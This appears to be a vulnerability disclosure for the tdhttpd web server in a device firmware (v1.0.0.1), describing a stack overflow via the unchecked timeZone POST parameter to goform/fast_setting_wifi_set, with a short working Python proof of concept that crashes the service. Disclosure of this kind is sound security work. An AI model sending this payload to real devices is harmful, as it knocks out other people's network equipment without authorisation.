Skip to content

Latest commit

 

History

History
32 lines (20 loc) · 940 Bytes

File metadata and controls

32 lines (20 loc) · 940 Bytes

Overview

Affected version

v1.0.0.1

Vulnerability details

tdhttpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the form_fast_setting_wifi_set function, which can be accessed through the URL goform/fast_setting_wifi_set.

  • 1.png

The function takes the POST parameter timeZone, does not validate its length, and copies it directly to local variables on the stack, causing stack overflows.

PoC

Poc of Denial of Service(DoS)

import requests

data = {
    b"ssid": b'A',
    b"timeZone": b"A"*0x100 + b":" + b"A"*0x400 
}
res = requests.post("http://127.0.0.1/goform/fast_setting_wifi_set", data=data)
print(res.content)